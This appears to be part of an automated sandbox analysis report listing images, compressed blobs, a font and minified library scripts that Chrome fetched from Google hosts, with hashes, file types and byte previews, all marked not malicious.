                                                                                                                                                                                                                                                                                          SHA-256:6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
                                                                                                                                                                                                                                                                                          SHA-512:82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/favicon.ico
                                                                                                                                                                                                                                                                                          Preview:............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 512 x 341, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):333997
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.985322126173097
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:zQk0MmjTJHXlG2JmcrQe0srLrgkzj/5A9Jt1FmRbeCDxXrBHH2dw7:zb0B/p1jJmQQe0srfF01FmRhDrn2O7
                                                                                                                                                                                                                                                                                          MD5:DBC4EBC7DAE0FD63CEF2040D23A18C9D
                                                                                                                                                                                                                                                                                          SHA1:5CEC02F6E30598137B362B9D3873C175FD84FBBB
                                                                                                                                                                                                                                                                                          SHA-256:339A797B65BDB969A9DFF792A9F42861387F747CDE2C8828E22664650CE8EB24
                                                                                                                                                                                                                                                                                          SHA-512:DBC4E96A172639AF99A66E4F415E46D9CC532D44FF6358F52B793ACA4ED50199B5278018621A37D1498F3FCCF5934FF8A8D75A2F7AEDED2E66F09832DED362D9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/MXe6LXpT_1IP98ElixZruA0GQf1A9i-4bfeCtry1-Gej5yWbCpSfNS0HX9JEJiPamMsW5bmJ6BlU_H4SzxLeAI0EWlkwFSA-DU5MCdW4k70Twm49Qzw?=w1440
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......U........t...tIDATx.L.I.,I.&.}.,".jf..-.......mf... ..q..........A..@.Pch.3.3.*#2"2"..m."........#..fj.0...........J.(P....p....Y..$.!..DP2. .`..$6..q../..g...LT..t.u9?.....w....eYx.........a.$.SV$...FSmX:.)B.P..3..|4.+.Y5#Q..mS.<.dM).Y.S.T.....`D...........w.t../.;.4.%<.Y..qX^.T.k.x...X..c:.2...6o.%Br.?.I..^..CRi..7.yIV..\Y.0.D,...{oA....>.".k...Et.I..4..h.h.....E...FB......j&.....H.&&.....2..+&p.'.b.F8{Cmv^.3q...\k...#D."F....`).).7...O..&.,..""..t.H..|..G....{k..O...zk.q.J2_..2...)..Z.5O.i.I..m...?.u.B;......! ..O.K.@D].],I....|8.`..\-%5Cw+.=L.b..l.$..0^...|.....7...>..V{..e....s.ei...iwqyu..rN.1.$..]\..1n.......".j..P.0....Q......e+6..D.8Kx@ET..[H.m.........CTS..t...........PU.A.I4i..FHt.!."........:...V...../.......}i.y..on...M...Z..)=.9#D.0...wS.m.4N.<,..{?....X....a.wZ..,l.....q...T.v.rJ.ly.......d.]n._]o_^...I.M..eS.!@.B...XF.....J2..|.......?......?..J29..b.+r.v.....V_.....~...x+.C.E...l_..w...5.n.2..M.........
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (440)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):565
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.285443873712561
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:PI8I5wmhO+rYyROdpjdnFe9BjEHUh1tnciaYdn0Fxy:PjIZOAGZFoBZtnYm0Fo
                                                                                                                                                                                                                                                                                          MD5:69F50E2C8B310E16F453FAAD4465BDFE
                                                                                                                                                                                                                                                                                          SHA1:B2C7E5BB0609E9F9B4DD212744DAE59D21FD9ECE
                                                                                                                                                                                                                                                                                          SHA-256:0276E4F710ACA35AACED49D17FA17ECEB886511EA9DDE180721789217D89D8B7
                                                                                                                                                                                                                                                                                          SHA-512:C92E9F58B73117FF95BE39DB033E67092486DFB7D85F2EBC63C4AD7BAD563230D1BED36ED9A47546B6BC88E4F7AA06EA13916F664B15103FBF2AB217B75FCEB6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:import{o as u}from"./0XPwTFcg.min.js";/**. * @license. * Copyright 2017 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */function s(e,l){return u({descriptor:n=>{const i={get(){var o,r;return(r=(o=this.renderRoot)===null||o===void 0?void 0:o.querySelector(e))!==null&&r!==void 0?r:null},enumerable:!0,configurable:!0};if(l){const o=typeof n=="symbol"?Symbol():"__"+n;i.get=function(){var r,t;return this[o]===void 0&&(this[o]=(t=(r=this.renderRoot)===null||r===void 0?void 0:r.querySelector(e))!==null&&t!==void 0?t:null),this[o]}}return i}})}export{s as i};.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 832x460, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):27692
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.993758896087244
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:768:U//DF+EwoNrbJNDYUSbaLlwx92sXXaqjtsZpK8qam:U/RH3jo+LlwxgsnaAtsbqam
                                                                                                                                                                                                                                                                                          MD5:85B6CA3E86D5E9F86C92BCFE903657C1
                                                                                                                                                                                                                                                                                          SHA1:F9B8208E848988A54D386C33C97FE86F31D55E2B
                                                                                                                                                                                                                                                                                          SHA-256:5D066863F636A37128F2B3B58EA904B089B4F8C676F5706326F0800A5153AAB3
                                                                                                                                                                                                                                                                                          SHA-512:7BFE3933ECB5F90A722AB8A98C9A17B936B73F970FDC15C3C392B6AEE7AA51327A18DF572807782582603E0C139648EE718AB6361D412A4FDB55B6E85A681DED
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/gI_Wu9CXaFAeN534A2tATDsZ3bEG8n3-WBS9wLKP04aO_ld5Fc9AtgS9HneoWjp3HQW4EglmvlKL6kbxRZGmoU1wCws3vfnezMcsqg=s0-rw-e365
                                                                                                                                                                                                                                                                                          Preview:RIFF$l..WEBPVP8 .l.......*@...>=..D"!.$..K(...em...28...%..a.K.67.v]"..d.......5..|}b...K...O.~.............E.k.._...[...7..5.......}p.e.o.o.g.........>.?......._.>._.3.......[M..S..........f.......Eq..Y..^..C..r.td..DB..Mqo...d.:hf..Q.m...../..Q..n.../..0,t.......X....Z.....#Q..`. .M......Qk...W.TK.9.%.Y%...d".hJ.x...A.......v..N...A.....c.YV{...!t.`C... ...I....5HC7.V...;....>U.`,<..6Y....,.).Y...$(<.+...dS.Uu..G.+.....^?..7..?.....;.]m..0f...:6>..6.Ql..7.Q.*.$...J.B....5T....'m84..}..k.....f..!..F{..-|=Bg[...s./....y....=....{c...~...[k.L).r...J.yQ..Q.`.:....^}y6?......as.A..B.^....U..!%.dC.PM.r..Sp ...Y..nH..:.(....$)..J.......C.!..A.<.[......Tm ....^..*.p..Q.1\..5.J".i._..%w..rR...e.....}.{a..].".M..'>N."...R.Q<&..H.d..w .e.7..a.ij..3.}...tq.d^.}.~......$\..V........*..2>..P..N&...Z..5..>f...Jzu..I...........w:R....G.N..Z...`.f>t.....Z..#.....r.....A]..SQY...5.6...........f..|.3.O....L.t..AI.<.E.77...b....c5...w.....B....:=.Bji.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (533)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):5613
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.300943980264754
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:+KJ/i0LFo5KRn6olUCxH/XoyUnrH3c0PZeDt+mQ0enRy6PhR2g+l:++i0LC8d6of9rjQ0eRy6PhI
                                                                                                                                                                                                                                                                                          MD5:2C5468E7D561B3E8BD3B0D8E997A60A6
                                                                                                                                                                                                                                                                                          SHA1:2509C190F03FAB3F162F7931D8367760FE3E6B87
                                                                                                                                                                                                                                                                                          SHA-256:DDA50EA7F5CCA0B6896C97C0E9785E52743D5A902EF34388930DC5ADA71DD906
                                                                                                                                                                                                                                                                                          SHA-512:8D92BCF1F5D32FD8ACBDB78799370886D99E31355DFA6F24FCEC808AF0240F450F2990356611F1D782764E639869A1FD98EB19434C9531D14F2109194CC06462
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:/*. AngularJS v1.6.10. (c) 2010-2018 Google, Inc. http://angularjs.org. License: MIT.*/.(function(J,d){'use strict';function A(d){k&&d.get("$route")}function B(t,u,g){return{restrict:"ECA",terminal:!0,priority:400,transclude:"element",link:function(a,f,b,c,m){function v(){l&&(g.cancel(l),l=null);n&&(n.$destroy(),n=null);p&&(l=g.leave(p),l.done(function(a){!1!==a&&(l=null)}),p=null)}function E(){var b=t.current&&t.current.locals;if(d.isDefined(b&&b.$template)){var b=a.$new(),c=t.current;p=m(b,function(b){g.enter(b,null,p||f).done(function(b){!1===b||!d.isDefined(w)||w&&!a.$eval(w)||u()});.v()});n=c.scope=b;n.$emit("$viewContentLoaded");n.$eval(k)}else v()}var n,p,l,w=b.autoscroll,k=b.onload||"";a.$on("$routeChangeSuccess",E);E()}}}function C(d,k,g){return{restrict:"ECA",priority:-400,link:function(a,f){var b=g.current,c=b.locals;f.html(c.$template);var m=d(f.contents());if(b.controller){c.$scope=a;var v=k(b.controller,c);b.controllerAs&&(a[b.controllerAs]=v);f.data("$ngControllerControl
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 512 x 341, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):333997
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.985322126173097
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:zQk0MmjTJHXlG2JmcrQe0srLrgkzj/5A9Jt1FmRbeCDxXrBHH2dw7:zb0B/p1jJmQQe0srfF01FmRhDrn2O7
                                                                                                                                                                                                                                                                                          MD5:DBC4EBC7DAE0FD63CEF2040D23A18C9D
                                                                                                                                                                                                                                                                                          SHA1:5CEC02F6E30598137B362B9D3873C175FD84FBBB
                                                                                                                                                                                                                                                                                          SHA-256:339A797B65BDB969A9DFF792A9F42861387F747CDE2C8828E22664650CE8EB24
                                                                                                                                                                                                                                                                                          SHA-512:DBC4E96A172639AF99A66E4F415E46D9CC532D44FF6358F52B793ACA4ED50199B5278018621A37D1498F3FCCF5934FF8A8D75A2F7AEDED2E66F09832DED362D9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......U........t...tIDATx.L.I.,I.&.}.,".jf..-.......mf... ..q..........A..@.Pch.3.3.*#2"2"..m."........#..fj.0...........J.(P....p....Y..$.!..DP2. .`..$6..q../..g...LT..t.u9?.....w....eYx.........a.$.SV$...FSmX:.)B.P..3..|4.+.Y5#Q..mS.<.dM).Y.S.T.....`D...........w.t../.;.4.%<.Y..qX^.T.k.x...X..c:.2...6o.%Br.?.I..^..CRi..7.yIV..\Y.0.D,...{oA....>.".k...Et.I..4..h.h.....E...FB......j&.....H.&&.....2..+&p.'.b.F8{Cmv^.3q...\k...#D."F....`).).7...O..&.,..""..t.H..|..G....{k..O...zk.q.J2_..2...)..Z.5O.i.I..m...?.u.B;......! ..O.K.@D].],I....|8.`..\-%5Cw+.=L.b..l.$..0^...|.....7...>..V{..e....s.ei...iwqyu..rN.1.$..]\..1n.......".j..P.0....Q......e+6..D.8Kx@ET..[H.m.........CTS..t...........PU.A.I4i..FHt.!."........:...V...../.......}i.y..on...M...Z..)=.9#D.0...wS.m.4N.<,..{?....X....a.wZ..,l.....q...T.v.rJ.ly.......d.]n._]o_^...I.M..eS.!@.B...XF.....J2..|.......?......?..J29..b.+r.v.....V_.....~...x+.C.E...l_..w...5.n.2..M.........
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 434
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):289
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.158808951445462
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:Xt6LcHs1bpDftHkSoL1m0ou+XduUTBJMCw5TmkxqAZVf7:XDuDftHklIXrlJm5qJqf7
                                                                                                                                                                                                                                                                                          MD5:E914B9466F540DA24029510A1ABCE7D5
                                                                                                                                                                                                                                                                                          SHA1:56903856FC2CB8CD9B1B21EACBB9EE19BD7FA13F
                                                                                                                                                                                                                                                                                          SHA-256:D5891F5414B4FD3D3B735D3DD114B28906E1FFB03B781A9D1E683622E0A90EA7
                                                                                                                                                                                                                                                                                          SHA-512:4AC59BEDE745B7B35205814E86B89C1113FD2CFEA555B1CEBCE644DE2FCF59E83A981AF52CD703D69813218A31BEC1F0392BC60B37C9CFB2973658884DD6A907
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:..........\P=o.0...+N.\.I.U..,,..lUq...J(...I.J.x....;......:.......o........tJ...0.NL...<~...D...G...d0r.u.VJ%$,.......~....~......a..k.....u..J...\2.Z.%bmK[...Y.3.L..J{.8BKS...G..:.!j.i.H7U.hJ<.eV.i*..h..h..x.ChE....|c+..{...1.p...9...+(..?..94..u.7.4...:%..r..........fq....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):351236
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.6567462935940074
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:+GcB2siUrXq5ZPpse6Rk4rgpjd4ianKTKzmaqqQISRv2DX30K:jJkq5ZRULgpJ4ianKTUHqNBRveX
                                                                                                                                                                                                                                                                                          MD5:89B98F1C3C183343F9D7BB07135FECF6
                                                                                                                                                                                                                                                                                          SHA1:298987D871A21341F769183A58361AC4F67C4587
                                                                                                                                                                                                                                                                                          SHA-256:400CD98457F8880D61838E29C4ABEDF02301EEC3C3A1610F862F16DD86251E1B
                                                                                                                                                                                                                                                                                          SHA-512:AC2ED2922DA1134D5B2BB0EC7ECC68FB1B733A5D646BC30A72FFDD0824D3963F1C1721F2D67FEEED0BEE74750AABBC8F0BBE71C1D0D1D62506D48339305BF766
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/rfShPjLrCpP1spYseWH2YzL9K62fcSLUnapJMso0sowj2kH8X4YBYDCYXKIRL9CcNz9xk7AHQJOl0FawCFFORDri1_caMFRvr26-Tpy7=rw-e365-w2880
                                                                                                                                                                                                                                                                                          Preview:RIFF.[..WEBPVP8L.[../..D..u!...R...6.Q.^..1.=W...R.....-....(q.K/.....r.H.{N..B-_...C0.....E1.1..6.>..S.].....Q.vk..v.*x.I<.......v.....0.1.a.x..."...10..}kY-...o....ow....N.&.U....\{.s.==...IwHy.k.wH.....s!.#.H....n.z..{.1.^i.....y.... (...m...e.K+S6...x..H..e..yQ......Z".......W.m.7....u.&......oF .a3... .@`..!h .!.!.!.:a..U..D.).>T..u......F..AU...<-:Ox.8k#.>.E8e..-..v`.N..E.`.".U..Z.@w#..N....Gm.0.....&2.#....%I..6....W4f..y@......%.t.Acf..zkk[.m[......H3..!......(.........?.\.c.Y...m........z....=M....l[WR.I$...`(.(.0...nz.U.F......4...Fk....jM?..M9..C.@.H .._P.)E....B..m........r.mN$..Tu7..n.P.=.}....D.26Q...{.1..B._..@(....j.m;....S...1....~.%..B-.b%....%P....+.B.&..:....S......$.z....0..+....j.=.".i..k...o...^o.{..72n.".F..{.2.6GS!...[.....[..U`V6.......<..dVf5+[.S.k...sr...7.Yo.Ic..Am.W..........m....N6M.....~_.....$I......2A).J..<.S[9..'..y..g&....s.Yff..Xf..Z............+U...Gx...l....$...t.;\..fVd3..q..m.6..LX.]....._......c. ./n
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 878
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):474
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.507645663882797
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:X/XIuMaZC88VSp00hhAmldhNWO3OXWru3pIgAJchYy:XvIDaZCohtf5El3pIkhh
                                                                                                                                                                                                                                                                                          MD5:88E32922D278F4DC8034AC9D2C192518
                                                                                                                                                                                                                                                                                          SHA1:1404165EE77D8DB447E4E6B8CCFA7D2AD92E4CAC
                                                                                                                                                                                                                                                                                          SHA-256:C64E445A2D557C323C6F44705868F223584F7C5D493F583555A9FE6A5CEFC075
                                                                                                                                                                                                                                                                                          SHA-512:92BA581D88691E149C3ABAC2CF35E9A408865B1EA2E3EA2568C8F62EC0D2C488D3C919FA2F1DC5DD74D821A150A350D7FF4F4CA8FC83E8DA998D7102B8D51F27
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:..........\S.n.@...+..si>.YD9D._|....V,..m$.../.......,g.\R..q?.......8...m^...z..<:t.....x:u.|9..}.>.?:?.n....4M0.\..+F..........P}..s.:?..e.....x..o...U.........Q.R..D....p..)..dLNy9.......,.P%J.c..7.4/...V.,...B-"k....%.....1...1.?.F.-?..W..6.......d.7.9...%..h..V.n. .z\...K.!.@..cgI.e.1...!7..U.?...("....O)H.../..4.....a.o.../...6...X;17....m.2.%n..m.!R..p-z.PS..is.=.B.~..h .d..{....qf...,.Nr...KD.T..F...v1.[...AzT..[..1...Wz..uxy...........}n...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):5894
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.942571738916282
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:B4Oseoml6hr7EXNUZ8OZIHyopZI7Td1+VtWL9H8TczIwWnb+GCI1DRfrn:B4OlAsGKHyopZidStfajI1DRT
                                                                                                                                                                                                                                                                                          MD5:73DBA3926222A563A16FA498867F1972
                                                                                                                                                                                                                                                                                          SHA1:CE55BB4B2E44B1EBA68F92250850541744437A4B
                                                                                                                                                                                                                                                                                          SHA-256:898675D45278864F40700EAC1E13883B3AF3D960727B0D4F1EE07156E016F6F2
                                                                                                                                                                                                                                                                                          SHA-512:1FA3CCFB5BE3A30BBC7DF5AE3845F25A67A1CCA663DCE5A43CCD1D9FC71363FADCBDC81F801ECA94899ECE6E39F125637CB3BA9F6168F3C7E1C39006633493A2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../..?...&.$...K.)z...FRv......j..M..............*...u...G.H[..<.0.....&..t1.?.m...*S..6..N..Nz.S.RYz."..lr.h.u[...<-X.Z........e7.'t.f....h..#...A...v./..{..c.v......E...?.I2..^.~....d...!.H..$}.Ih.lJ.....Y...X.!.*n...e...^4..#I..4..?..qs..e..)..8..LR6..A.~.4.S.j.\..).x...:{.....:.X.C/S.D...gUm....[!4%.KH.wdU.MU..8.U.k[aPU;.L.....\.q....JA..Y.B...f..BS.G...XtU.+.En..e5d..N5.!l4$.!d..K...K....#......I.%.PL.I...l..^G2.p..........%..M*I...m....?.$....KR..A.,N..hI.+.eR.F.+.)..q...d.~.C...j.l..H..:.C4_}HD..K......\.M......:.!H........q.-)S...._'...L...!.L... .. ...j.}.k.L.k .8.l......}......[.M.t.0..+...VD./~j.6lg.akw..Jk.5.b`.I..@+..../l.DT....{..G.[7O..[o...R,.WBsu.R..ov.........G..y..W.......a.?.Y?..}.......0|.9...z...+...8O..v...pqyP....J......7.S....\..r/..!.B1..".0<.........</u...Dbm.o.e.H..%.#z......ZO|.^...K).O|]5.0...#..v.X..!y=[.{.5.\....a#.e.d.....DR|....^.X.K.\..9.S..Y.{..n.UgHbm..zP...\&q.V...g...G...?....<..sI....X'.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4621
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.935558464764354
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:Ll+GIPXVtxc7mP5k98Bij2A8brUZFRQtbWQoiKlBGZWEIiO+L7h:LIPXVqU5k98Bij8MFFQaBGZ9JO+LV
                                                                                                                                                                                                                                                                                          MD5:57C988CBCC8299B8E99D5FCBA7242AA7
                                                                                                                                                                                                                                                                                          SHA1:69867D807F54484FD04B1E161FF58ED00F2EAA10
                                                                                                                                                                                                                                                                                          SHA-256:758858CA060007C297CA68F3D187CA027F16C3064CB74FF848D2B12D984577D2
                                                                                                                                                                                                                                                                                          SHA-512:2BAB7006D9A364EF1D58D9F939F8966D146CAF07466D4B80AA1B3216F7EAA204CA2CC312429752B0B4A82FA448B07F6769C87791384E9F7F7347E29747645A5F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..y...}.?...C.j/I..H...`....l.p........?...?\..UI... .J.H*!.....#..17.....X.M..:v.=$.:vW;.3=..~.c.....9.@..Ilw..{.y......"E..)R.H."E..)R.H."E..)R..J5...g....0.uJ......_.R..!.c5...2{b..cZkD...lK;.R...R....px```...mk.......y4...o.2....DR.-..DD[.%....+..{u.|X....;wn3p<.L&..DE//....l3....|.....a..q333k........Hk.h.-<4.?].~o.O..........<.L&.>.H>%"8....m.<....}..4/..;.....;7X.s#5QE...Z&..|..8.*..1......?.x...v......+..2.........R...5v.{Gv..-..yk.a$N......A.....&-.>.*N...B....os...fr..(.-..1.17..#p.6.#A..a-.+.....wxpt...|..[Z..A...#5.....w&...<4....Yz<.*@.............6...33.pK.C...n...u.ny...2s.&..\t..[\.]4..1q.....af.5-..F.[,/..\..&...}..x...R...r.....e...!~8....|K.B..er'...O.yr.......\.U.p.?....@n..I......N...-V(.-..(..d...Z....'w.w.^$f[t.p.~.".MT9\.A.....|...3..Rl.].\t.T.E....#....T..\9.v...$....V.%y..X&O...{'v.....T.....T...od7.9.n.5=:..*..#T/M...#{..[...1...IVHy..5S.2...F.3i..].n;..Q.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):5805
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9542006310437126
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:t9UzyN3uV9rFvd89BSK+b+n3P/WB64548U3zuH1pgD/ln5KCKH:/U2N+V9rj8DSK+bB5DKuH1oln5lq
                                                                                                                                                                                                                                                                                          MD5:D0656A971972F0807AB746BE522ADD05
                                                                                                                                                                                                                                                                                          SHA1:5DEB386A5C5481D9A4AE91E37E175A4E656AE245
                                                                                                                                                                                                                                                                                          SHA-256:C7B0BC63C6F5631DADD177E4EA287231713A0FF78A36213806ACC9BF760A4D4E
                                                                                                                                                                                                                                                                                          SHA-512:6DC7991439E91FF4901ACF4AB19FBFC83A9B9E5CB26ABB9987FA72937C84609407A894806B2E7802419C7A550C7F3075DCE0DA33063705ECC51F8F957A6D3D79
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....dIDATx..y....?.{o/4K./..(.`.d......8..I.8.3.e.%...8nAt.h.'.8O6......q.lFE.D.PD.f...Uu......t..[....y.~.....U.:...s.D..%J.)Rh.r..*...2M5$..16.5.. .D...E."&....'..=/u.WnK..@P....=Y.*=kf..Vc..F..F9*i..~80..:T..P...A.BU2j.RF....m.........1...<.W.]...S.."=M..:..H...&.z...?...*...H.[RE...*!i...k..".;.'b.6*o".5..$..>...0...9=A.:o.D\..:ew&..Q..w>v].........*....D....H..<.f..^..sF.....3OD......iIk..D..........`w.t.. .pyQ.[..H...)6.c:....F..#.....DE.......V.{...,.'V>.4.......g.8....fnK.c.FD)>a[#.~....=.%..!Y....-.{..._&.0..._V...R......=..2 .nu..7....]..K...PT..nE..mO..y..*lk..X......<.j1.*..%..z..k|.....a[#.U..1..Y.......C>.....w.ra.$...k..'....}yr.?..~....?.....c8.m......y.yj....|..=c.u.}{S...Pm.b...j}J..G>.....E*.^...... ..B.c>u..=..omj..["O...HGe+2.u...H8wn......m..H.6......x.,_.;.;..)z........%q..*$.qj...8....8=.y.. |sW..4.s;-.A....>Y..7Q..e.-:o........s...I..s.,_u.P.....`=c.4..+.%q;...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 512 x 293, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):252091
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.993281906966295
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:6144:SXNExScG8yibu+NaFxm8MDil00er56BtjApuBACDSfMEBKqpzMZQ:SXEiiS+488MDK5Mwj0puSfMEBVxKQ
                                                                                                                                                                                                                                                                                          MD5:95AA3850A2FBF70660D4DCBF1DA4CF0B
                                                                                                                                                                                                                                                                                          SHA1:FD24A75208F0355F3FAD456A0A30EBF996102AFC
                                                                                                                                                                                                                                                                                          SHA-256:19BC9C362CECD1A745C7200485168BA3345D5589AC8241E481D2C69C1E52278F
                                                                                                                                                                                                                                                                                          SHA-512:F73BDC4D7AF3D7FB6BFD89EB45AFD126F6295E059D4DB22128A58B0D40F9C99FCC780C96ACE55603DA4F1DFEDFB50582527B827B2BE20E10858B8F5701FB7402
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......%.......Z.....sBIT....|.d... .IDATx....uI.&....s.u...32r......[.........G`.....".",Y .....h@Z@.(."..."....s.TY.`v...........AM.............7M.B...o...&..=?..\........].L........x.....;M.<}..U.......+.?Z...,/.\._... b0.....".kD.M.........@.D`.1.1..*.d.A.M......"f...gj3^../D.y....M. .%..4{.P.M.......t.J...A.......A>..6..F...Z.....G........rG'..}....GW!..;H..TcN.&...u..........*...n.y...i.T(._}......`Y..h..F'.o..g.1&..]co.@ 6Z..e...#`N.`B.e. ..X..........>..T$.GRd|.sE.}...)...c....2...1..z.I7..+..".*..P(z..........Q./g...K.......v.Q.>.`.....@.e.t.u..k*9..5...>.i.9.....H...oY*.m.......%p)`*I...x.v..7..s...y..D..Fi..j- ...J%.1....P....5..,`"l.."....E.6J).....u].9f..}.(...........U.......a..je.....m.h..xXQ..m...Ke.kE.;..CTqs{.*........w....]pX.....,..........(ps..rA.........'.3..f4(3-+...........h.g..g..............._~............?......3......._.q._...5...U..].....u.0y.,S.{.)&?.nrb.).1.F.a....If......tz*..NsS.3o...W:m
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 34184, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):34184
